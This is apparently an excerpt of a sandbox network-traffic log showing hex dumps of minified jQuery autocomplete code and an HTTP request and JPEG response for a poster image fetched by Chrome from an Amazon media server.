                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 62 6f 64 79 22 2c 73 65 72 76 69 63 65 55 72 6c 3a 6e 75 6c 6c 2c 6c 6f 6f 6b 75 70 3a 6e 75 6c 6c 2c 6f 6e 53 65 6c 65 63 74 3a 6e 75 6c 6c 2c 77 69 64 74 68 3a 22 61 75 74 6f 22 2c 6d 69 6e 43 68 61 72 73 3a 31 2c 6d 61 78 48 65 69 67 68 74 3a 33 30 30 2c 64 65 66 65 72 52 65 71 75 65 73 74 42 79 3a 30 2c 70 61 72 61 6d 73 3a 7b 7d 2c 66 6f 72 6d 61 74 52 65 73 75 6c 74 3a 65 2c 66 6f 72 6d 61 74 47 72 6f 75 70 3a 66 2c 64 65 6c 69 6d 69 74 65 72 3a 6e 75 6c 6c 2c 7a 49 6e 64 65 78 3a 39 39 39 39 2c 74 79 70 65 3a 22 47 45 54 22 2c 6e 6f 43 61 63 68 65 3a 21 31 2c 6f 6e 53 65 61 72 63 68 53 74 61 72 74 3a 69 2c 6f 6e 53 65 61 72 63 68 43 6f 6d 70 6c 65 74 65 3a 69 2c 6f 6e 53 65 61 72 63 68 45 72 72 6f 72 3a 69 2c 70 72 65 73 65 72 76 65 49 6e 70 75 74
                                                                                                                                                                                          Data Ascii: body",serviceUrl:null,lookup:null,onSelect:null,width:"auto",minChars:1,maxHeight:300,deferRequestBy:0,params:{},formatResult:e,formatGroup:f,delimiter:null,zIndex:9999,type:"GET",noCache:!1,onSearchStart:i,onSearchComplete:i,onSearchError:i,preserveInput
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 64 2e 66 69 78 50 6f 73 69 74 69 6f 6e 43 61 70 74 75 72 65 29 2c 64 2e 65 6c 2e 6f 6e 28 22 6b 65 79 64 6f 77 6e 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 64 2e 6f 6e 4b 65 79 50 72 65 73 73 28 61 29 7d 29 2c 64 2e 65 6c 2e 6f 6e 28 22 6b 65 79 75 70 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 64 2e 6f 6e 4b 65 79 55 70 28 61 29 7d 29 2c 64 2e 65 6c 2e 6f 6e 28 22 62 6c 75 72 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 6f 6e 42 6c 75 72 28 29 7d 29 2c 64 2e 65 6c 2e 6f 6e 28 22 66 6f 63 75 73 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69
                                                                                                                                                                                          Data Ascii: ow).on("resize.autocomplete",d.fixPositionCapture),d.el.on("keydown.autocomplete",function(a){d.onKeyPress(a)}),d.el.on("keyup.autocomplete",function(a){d.onKeyUp(a)}),d.el.on("blur.autocomplete",function(){d.onBlur()}),d.el.on("focus.autocomplete",functi
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 6a 61 78 28 29 7d 2c 65 6e 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 64 69 73 61 62 6c 65 64 3d 21 31 7d 2c 66 69 78 50 6f 73 69 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 63 3d 61 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 43 6f 6e 74 61 69 6e 65 72 29 2c 64 3d 63 2e 70 61 72 65 6e 74 28 29 2e 67 65 74 28 30 29 3b 69 66 28 64 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 7c 7c 62 2e 6f 70 74 69 6f 6e 73 2e 66 6f 72 63 65 46 69 78 50 6f 73 69 74 69 6f 6e 29 7b 76 61 72 20 65 3d 62 2e 6f 70 74 69 6f 6e 73 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 2c 66 3d 63 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 67 3d 62 2e 65 6c 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 68 3d 62 2e 65 6c 2e 6f 66 66 73 65 74
                                                                                                                                                                                          Data Ascii: jax()},enable:function(){this.disabled=!1},fixPosition:function(){var b=this,c=a(b.suggestionsContainer),d=c.parent().get(0);if(d===document.body||b.options.forceFixPosition){var e=b.options.orientation,f=c.outerHeight(),g=b.el.outerHeight(),h=b.el.offset
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 78 29 2c 62 2e 6f 70 74 69 6f 6e 73 2e 74 61 62 44 69 73 61 62 6c 65 64 3d 3d 3d 21 31 29 72 65 74 75 72 6e 3b 62 72 65 61 6b 3b 63 61 73 65 20 68 2e 52 45 54 55 52 4e 3a 69 66 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 3d 3d 2d 31 29 72 65 74 75 72 6e 20 76 6f 69 64 20 62 2e 68 69 64 65 28 29 3b 62 2e 73 65 6c 65 63 74 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 68 2e 55 50 3a 62 2e 6d 6f 76 65 55 70 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 68 2e 44 4f 57 4e 3a 62 2e 6d 6f 76 65 44 6f 77 6e 28 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 7d 61 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d
                                                                                                                                                                                          Data Ascii: x),b.options.tabDisabled===!1)return;break;case h.RETURN:if(b.selectedIndex===-1)return void b.hide();b.select(b.selectedIndex);break;case h.UP:b.moveUp();break;case h.DOWN:b.moveDown();break;default:return}a.stopImmediatePropagation(),a.preventDefault()}
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 6b 75 70 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 67 28 61 2c 62 2c 66 29 7d 29 7d 2c 68 26 26 63 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6c 65 6e 67 74 68 3e 68 26 26 28 63 2e 73 75 67 67 65 73 74 69 6f 6e 73 3d 63 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 73 6c 69 63 65 28 30 2c 68 29 29 2c 63 7d 2c 67 65 74 53 75 67 67 65 73 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 2c 67 3d 74 68 69 73 2c 68 3d 67 2e 6f 70 74 69 6f 6e 73 2c 69 3d 68 2e 73 65 72 76 69 63 65 55 72 6c 3b 69 66 28 68 2e 70 61 72 61 6d 73 5b 68 2e 70 61 72 61 6d 4e 61 6d 65 5d 3d 62 2c 68 2e 6f 6e 53 65 61 72 63 68 53 74 61 72 74 2e 63 61 6c 6c 28 67 2e 65 6c 65 6d 65 6e 74 2c 68 2e 70 61 72 61 6d 73 29 21 3d 3d 21 31 29 7b 69 66
                                                                                                                                                                                          Data Ascii: kup,function(a){return g(a,b,f)})},h&&c.suggestions.length>h&&(c.suggestions=c.suggestions.slice(0,h)),c},getSuggestions:function(b){var c,d,e,f,g=this,h=g.options,i=h.serviceUrl;if(h.params[h.paramName]=b,h.onSearchStart.call(g.element,h.params)!==!1){if
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 3d 21 31 2c 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 2d 31 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 62 2e 6f 6e 43 68 61 6e 67 65 54 69 6d 65 6f 75 74 29 2c 61 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 43 6f 6e 74 61 69 6e 65 72 29 2e 68 69 64 65 28 29 2c 62 2e 73 69 67 6e 61 6c 48 69 6e 74 28 6e 75 6c 6c 29 7d 2c 73 75 67 67 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 76 6f 69 64 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 68 6f 77 4e 6f 53 75 67 67 65 73 74 69 6f 6e 4e 6f 74 69 63 65 3f 74 68 69 73 2e 6e 6f 53 75 67 67 65 73 74 69 6f 6e 73 28 29 3a 74 68 69 73 2e 68 69 64 65 28 29 29 3b 76 61 72 20 62 2c 63 3d 74 68 69 73 2c 64 3d 63 2e 6f
                                                                                                                                                                                          Data Ascii: =!1,b.selectedIndex=-1,clearTimeout(b.onChangeTimeout),a(b.suggestionsContainer).hide(),b.signalHint(null)},suggest:function(){if(!this.suggestions.length)return void(this.options.showNoSuggestionNotice?this.noSuggestions():this.hide());var b,c=this,d=c.o
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 30 3f 62 3a 33 30 30 29 29 3a 22 66 6c 65 78 22 3d 3d 3d 64 2e 77 69 64 74 68 26 26 65 2e 63 73 73 28 22 77 69 64 74 68 22 2c 22 22 29 7d 2c 66 69 6e 64 42 65 73 74 48 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 63 3d 62 2e 65 6c 2e 76 61 6c 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 64 3d 6e 75 6c 6c 3b 63 26 26 28 61 2e 65 61 63 68 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 65 3d 30 3d 3d 3d 62 2e 76 61 6c 75 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 63 29 3b 72 65 74 75 72 6e 20 65 26 26 28 64 3d 62 29 2c 21 65 7d 29 2c 62 2e 73 69 67 6e 61 6c 48 69 6e 74 28 64 29 29 7d 2c 73 69 67 6e 61 6c 48 69 6e 74 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                          Data Ascii: 0?b:300)):"flex"===d.width&&e.css("width","")},findBestHint:function(){var b=this,c=b.el.val().toLowerCase(),d=null;c&&(a.each(b.suggestions,function(a,b){var e=0===b.value.toLowerCase().indexOf(c);return e&&(d=b),!e}),b.signalHint(d))},signalHint:functio
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 76 61 72 20 62 3d 74 68 69 73 3b 69 66 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 21 3d 3d 2d 31 29 72 65 74 75 72 6e 20 30 3d 3d 3d 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3f 28 61 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 43 6f 6e 74 61 69 6e 65 72 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 22 2b 62 2e 63 6c 61 73 73 65 73 2e 73 75 67 67 65 73 74 69 6f 6e 29 2e 66 69 72 73 74 28 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 62 2e 63 6c 61 73 73 65 73 2e 73 65 6c 65 63 74 65 64 29 2c 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 2d 31 2c 62 2e 69 67 6e 6f 72 65 56 61 6c 75 65 43 68 61 6e 67 65 3d 21 31 2c 62 2e 65 6c 2e 76 61 6c 28 62 2e 63 75 72 72 65 6e 74 56 61 6c 75 65 29 2c 76 6f 69 64 20 62 2e 66 69 6e 64 42 65 73 74 48 69 6e 74 28 29 29 3a 76
                                                                                                                                                                                          Data Ascii: var b=this;if(b.selectedIndex!==-1)return 0===b.selectedIndex?(a(b.suggestionsContainer).children("."+b.classes.suggestion).first().removeClass(b.classes.selected),b.selectedIndex=-1,b.ignoreValueChange=!1,b.el.val(b.currentValue),void b.findBestHint()):v


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          18192.168.2.1649735151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC676OUTGET /images/M/MV5BZTYyMWUyOTQtM2VlNS00YTA4LWI0YTgtODg1ZDg5ZDQzYWI5XkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 32839
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 28776c6a-6d59-43db-bda2-2fa077f4919c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 03 Oct 2017 15:22:37 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 23:55:54 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2324363
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200175-IAD, cache-ewr-kewr1740029-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 d3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 04 06 07 08 00 02 03 01 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b8 9b 85 d7 8e 8e 60 2f 75 0e e0 2d 83 7e
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4`/u-~
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: b0 f2 66 d6 28 8e 9f 5a 5c c3 4d cb 47 da a1 03 12 ce 99 30 5d 3d 8a e6 b2 86 49 9e ac 67 a4 9f e2 34 8d 92 f2 80 fa 6f 94 d0 3d 4d f3 9b 6f 23 71 0f ce c5 66 c3 26 d4 c3 12 88 7d 73 76 ce 10 9c d3 7c ec aa 5d 75 ea 36 b4 4d a0 f5 60 b6 db 67 17 d3 af 15 16 fa 08 7a 58 5b 71 ab 3c de c5 db f1 f6 55 6a 90 aa b0 c9 56 ea eb 92 bb 0e 53 44 bb 0f d1 0e f5 09 b0 7b 70 5b 87 30 6a 88 55 c9 2a 59 49 6a 2b 49 49 6a 1b 84 a7 f9 36 78 ab 84 02 74 41 5b 07 59 ec df a3 e7 31 68 6d f7 ab fc fd 4d e1 85 9a 73 a8 51 c5 e4 9e bc 64 d8 56 72 8c fb f9 62 49 a2 b2 b9 38 77 b0 bb 40 1d 71 d6 c0 ab af 1d d6 c4 ab ae 4a 0b 20 a6 b9 77 8b 21 95 c3 a9 64 37 ad 7a 55 9a de b2 62 5a 6c a5 53 83 33 12 78 2b 69 66 81 75 09 b3 65 cf 17 51 76 b2 d2 03 af 1e 93 92 58 6f bd 96 6a e3 52
                                                                                                                                                                                          Data Ascii: f(Z\MG0]=Ig4o=Mo#qf&}sv|]u6M`gzX[q<UjVSD{p[0jU*YIj+IIj6xtA[Y1hmMsQdVrbI8w@qJ w!d7zUbZlS3x+ifueQvXojR
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 01 4a 85 7b 71 42 17 4c 39 d4 35 f5 3c 00 ec b5 27 13 92 fe 3c 4e 7b 28 e1 44 5d 0d 47 7e 41 1b 6e 10 b6 ab e5 e9 14 42 e4 19 92 8e d4 9e 1b 16 0f 82 c4 fc f0 eb e7 3f 4f 12 ab f0 e0 88 9e 0d c3 bd b2 ce 3b ef e1 c7 b6 64 28 d9 2f ab ba 94 9e 8a fa 8f d4 2f 13 c8 3e 91 fe 48 19 4a f0 42 78 26 61 ac e7 8e be e6 19 99 87 b9 98 69 be 61 9a 66 1e e6 61 ef b9 86 66 61 99 98 7b 99 89 e6 66 2e 66 61 99 98 66 66 1e e6 62 67 99 87 9e e6 4b e6 99 86 da 66 2f ff c4 00 31 10 00 01 03 03 02 05 02 06 03 00 03 01 01 00 00 00 02 00 01 03 04 11 12 05 13 10 14 15 21 31 16 41 06 20 22 32 33 34 23 42 51 24 30 50 40 52 ff da 00 08 01 01 00 01 08 02 ff 00 c6 9f b4 66 b6 05 6c 0a e5 c5 72 e2 b9 71 5b 02 b6 05 72 e2 b9 71 5c b8 ad 86 5b 2c b6 05 6c 0a d8 15 b0 2b 60 56 c0 ae 5c
                                                                                                                                                                                          Data Ascii: J{qBL95<'<N{(D]G~AnB?O;d(//>HJBx&aiafafa{f.faffbgKf/1!1A "234#BQ$0P@Rflrq[rq\[,l+`V\
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 2e 5f 28 e8 27 4f 41 53 ec fa 75 51 79 e9 55 48 b4 4a a7 4d a2 55 21 d1 ea 59 53 44 f1 b8 33 aa 8f b0 bf f1 0b f2 07 0a a7 c6 29 1d 75 66 5d 59 97 56 5d 59 97 56 5d 59 75 65 d5 57 55 5d 55 75 54 1a 9e 44 22 9a b7 f9 70 47 a9 10 e6 9f 51 b5 90 ea 4e f6 bd 3d 7b cc 42 2e 7a 8b 8a e7 ce f8 89 6a 32 08 c8 48 b5 02 67 52 d6 18 3c d6 2a e7 c5 ac 35 a4 43 29 2e a1 22 ea 12 ae a1 2a e7 e5 5c fc cb 9e 99 73 d3 2e 7a 75 ce ce b9 da 85 ce d4 2a 79 a5 92 56 dc 55 1f 61 7f e2 17 e4 0e 15 4f 68 cd df a9 d3 ae a9 4e ba b5 32 ea 74 eb aa 53 ae a9 4c ba a5 32 ea b4 cb aa d3 2e ab 4c ba a5 3a 6d 42 17 5c d0 27 d4 60 64 35 f1 17 87 d4 e0 6f 3d 56 9d 36 a3 0b a7 af 89 97 52 85 73 f0 ae a3 0a ea 30 ae a3 12 ea 11 2e a1 12 ea 11 2e 7e 25 d4 a1 5d 56 04 da 8c 4f e3 a8 44 c9 b5
                                                                                                                                                                                          Data Ascii: ._('OASuQyUHJMU!YSD3)uf]YV]YV]YueWU]UuTD"pGQN={B.zj2HgR<*5C)."*\s.zu*yVUaOhN2tSL2.L:mB\'`d5o=V6Rs0..~%]VOD
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 2f 4e 8a f4 e0 2f 4e 02 8b 44 18 da ca 5f 87 c2 47 ba f4 e4 6b d3 91 af 4e 44 bd 37 12 f4 d4 4b d3 30 af 4c 40 bd 33 02 f4 cc 0b d3 70 2f 4e 40 bd 39 4e bd 37 4e bd 37 02 f4 dd 3a f4 e5 3a a3 d3 22 a2 96 f1 a9 fe d6 55 3a c5 35 31 bc 72 7a 82 91 7a 86 8d 1e b7 4c 22 04 f4 75 f1 56 64 f1 56 6a 11 51 e3 bb 06 ad 04 e3 21 07 a8 69 17 a8 e8 d5 26 b1 4f 56 78 46 aa 75 98 29 8d e3 3a 4a a0 aa 0d c0 ac d5 a1 a3 3c 24 a4 ae 8e ac 08 c2 6d 7e 92 24 df 13 53 3a a5 d4 20 ab ed 1f a9 a9 57 a9 29 57 a9 e9 78 55 d7 43 49 6d d1 f8 82 23 fb 22 f8 8a 94 de cf 5b aa c5 47 b7 97 a9 e9 99 07 c4 b4 a4 a0 aa 8e 70 dc 09 fe 21 a5 89 7a 92 36 ee 54 ba bd 3d 53 b0 8c bf 11 c1 19 10 3f a9 e9 d7 a9 61 41 26 ee c9 f0 9f c3 22 82 32 7b be b4 2c 35 73 33 68 30 81 52 85 fe 25 16 19 21
                                                                                                                                                                                          Data Ascii: /N/ND_GkND7K0L@3p/N@9N7N7::"U:51rzzL"uVdVjQ!i&OVxFu):J<$m~$S: W)WxUCIm#"[Gp!z6T=S?aA&"2{,5s3h0R%!
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 2b 1b b2 69 d0 54 bf b4 95 19 79 a3 a9 66 c8 13 55 46 39 09 cb 5b bf 8b 46 53 65 dc 8c b2 7e df 0f 7e cf 0d 5f b5 31 a0 fb 99 5b bb 32 6f b9 d4 8e bc 32 c9 07 dd 67 76 b1 3b 70 7f 74 63 f2 5d 5d 64 b3 59 2b ab f1 bf cd 74 ec 8c dc df bc 16 06 ba 30 b3 76 b2 f8 7d ad 51 c2 ae 21 94 30 2e 52 8f 74 e2 12 8a 8d 88 99 e3 d3 e9 0c 37 98 63 d3 e4 03 35 4d 41 45 52 c4 e2 f4 d4 1b cf 0b 90 d0 36 ec 86 f4 d4 99 0e e9 35 00 0c a4 a2 a5 a3 92 4d b5 3d 1d 1c 27 14 65 53 41 43 4e f1 31 6d e9 ad b8 ca a2 96 86 9d e2 63 a6 d3 28 a7 6b b1 d2 e9 f0 91 0c bc bd 17 d0 29 e0 a1 17 90 4e 5a 7a 18 a9 da a5 ca 82 95 b2 b6 dd 03 c7 14 82 7c 88 49 24 6b a7 d2 6d ee 28 f9 13 02 34 4f 42 25 18 a2 1a 30 68 c8 8e 3a 41 29 99 a9 86 92 a7 0c 42 a6 88 c7 24 54 14 c0 0e 4a 2e 58 c8 05 c4
                                                                                                                                                                                          Data Ascii: +iTyfUF9[FSe~~_1[2o2gv;ptc]]dY+t0v}Q!0.Rt7c5MAER65M='eSACN1mc(k)NZz|I$km(4OB%0h:A)B$TJ.X
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 49 ea 3e 0d a9 7d cb 4f 18 b6 4a 44 e4 43 fc 23 a3 74 a6 6e b4 2d 7f ee 69 8b b5 f7 a5 da c6 93 36 e2 6d 44 d4 d2 8b d3 92 12 4d 8e 11 fb 4d 34 ab a5 d4 c5 48 7d 5c 90 ba df ec 7a b8 31 f5 11 42 d7 42 77 dd b3 31 eb c2 3f eb 76 23 9d 0f a8 7f 4e db e6 57 09 34 de a3 92 a2 29 e2 8d 09 d2 66 eb 14 ff 00 aa 5a 62 96 95 1b ba 6b e3 7e 16 79 28 7a d7 f1 2d 18 be 4f 18 7a 5c 50 f4 78 a1 42 51 7c 73 5c ed 5f 27 57 a0 d2 8c 8c 48 ff 00 94 43 57 04 79 47 90 cf 2d 9e 6b 3c d9 1e 6c 8f 32 47 b0 9a 3d 8c cf 61 33 ce 99 e7 cc f3 e6 7b 09 9e c6 66 a7 57 3d 54 94 9c 53 31 49 25 da d1 68 b2 cb 2c be d6 5f 6b 2c b2 cb 2c 65 37 f1 ca 23 a1 a2 e3 72 f1 fa 63 c7 e9 4f 1b a5 1f 4f d3 8f 43 a6 16 97 4c 3d 1d 05 f3 87 4c 61 d3 1b 7d 39 87 4e 61 d3 98 74 c6 3d 30 bc 5f b9 b8 65
                                                                                                                                                                                          Data Ascii: I>}OJDC#tn-i6mDMM4H}\z1BBw1?v#NW4)fZbk~y(z-Oz\PxBQ|s\_'WHCWyG-k<l2G=a3{fW=TS1I%h,_k,,e7#rcOOCL=La}9Nat=0_e
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ca 6c b8 98 98 a4 64 66 6a b3 50 75 a2 b9 dc c0 75 22 f8 cf ec 6c bf 64 3e 4a 6b c3 31 12 2c 58 72 1d 58 c7 97 5d b3 50 c5 b1 c4 b3 46 62 9f 6b 76 6a c8 9a b4 8a 7c 31 3f 05 cc 84 9c bc 2a 7d 03 97 ef 8f e9 34 6f 76 ba 2a 28 7d 05 09 72 ff 00 48 a7 fe 2b f4 12 a4 c6 cb f6 c9 8a 66 42 77 91 37 79 32 9a f0 c4 7c f6 52 b7 92 1d 67 c3 8f 50 c5 d4 fd ee 50 ba 94 56 9c 67 16 89 ab 36 9e 05 9a 14 87 e2 3e 1c be a3 57 ed b2 9f 0c 43 39 11 24 47 a9 9c 4d f5 f9 df 23 7a 87 d5 b1 ca ef bd 86 8c 51 61 a3 26 b8 d4 91 9c 8c a4 67 23 39 17 7f 86 ff 00 f1 6d e8 b7 ae ff 00 92 ff 00 82 c5 8b 16 2d e9 b7 65 fd 34 7f ff c4 00 41 10 00 01 02 02 05 09 06 03 05 08 03 01 01 00 00 00 01 00 02 11 21 03 12 31 41 51 10 61 71 81 91 92 a1 b1 d1 20 22 52 c1 e1 f0 32 42 a2 13 30 40 53
                                                                                                                                                                                          Data Ascii: ldfjPuu"ld>Jk1,XrX]PFbkvj|1?*}4ov*(}rH+fBw7y2|RgPPVg6>WC9$GM#zQa&g#9m-e4A!1AQaq "R2B0@S
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: e0 5b 19 80 da d3 d7 09 69 4c f8 61 0f d4 0e ae 0a 8b 9f 45 45 cf a2 a2 e7 d1 51 73 54 5c 0a a2 e0 55 17 02 a8 b8 15 45 c0 aa 2e 05 51 7d 25 32 af 75 d7 43 0f e0 d8 3b cb 25 c1 52 05 48 a9 02 a4 0a 93 9a a4 e0 55 27 02 9f c0 a7 f0 3d 13 f8 1e 89 fc 0f 44 ee 05 47 61 4e 3b 8e e8 89 dc 77 44 ef a5 dd 13 fe 93 d1 1f a4 a8 ee 94 4e e9 47 81 47 81 47 81 51 dd 2a 3b 0a e4 a3 b1 47 62 3c 11 e0 8e 43 92 3b 14 64 d7 5a 34 64 fc b7 f2 ec 00 ea bf a6 b3 a0 9a d3 ef 52 68 f7 ad 0e d7 45 cd 47 6a 6a 07 66 41 c1 0c 83 21 45 1d 8a 3b 7e e7 c0 79 8c 9f 96 fe 59 06 51 07 7e 70 b7 fa b1 56 1b 1c 2c 76 50 a1 b5 3b 82 8f 24 c8 fb d4 80 6f bd 6a 97 50 54 7a dd 3e 09 d1 cd 76 cb 32 3a 19 ad 1b 15 1e b6 cb 82 a5 9e 06 df 24 01 4c 87 bc d1 4d 3b 62 a2 34 84 e1 90 7d c7 80 f3 19
                                                                                                                                                                                          Data Ascii: [iLaEEQsT\UE.Q}%2uC;%RHU'=DGaN;wDNGGGQ*;Gb<C;dZ4dRhEGjjfA!E;~yYQ~pV,vP;$ojPTz>v2:$LM;b4}
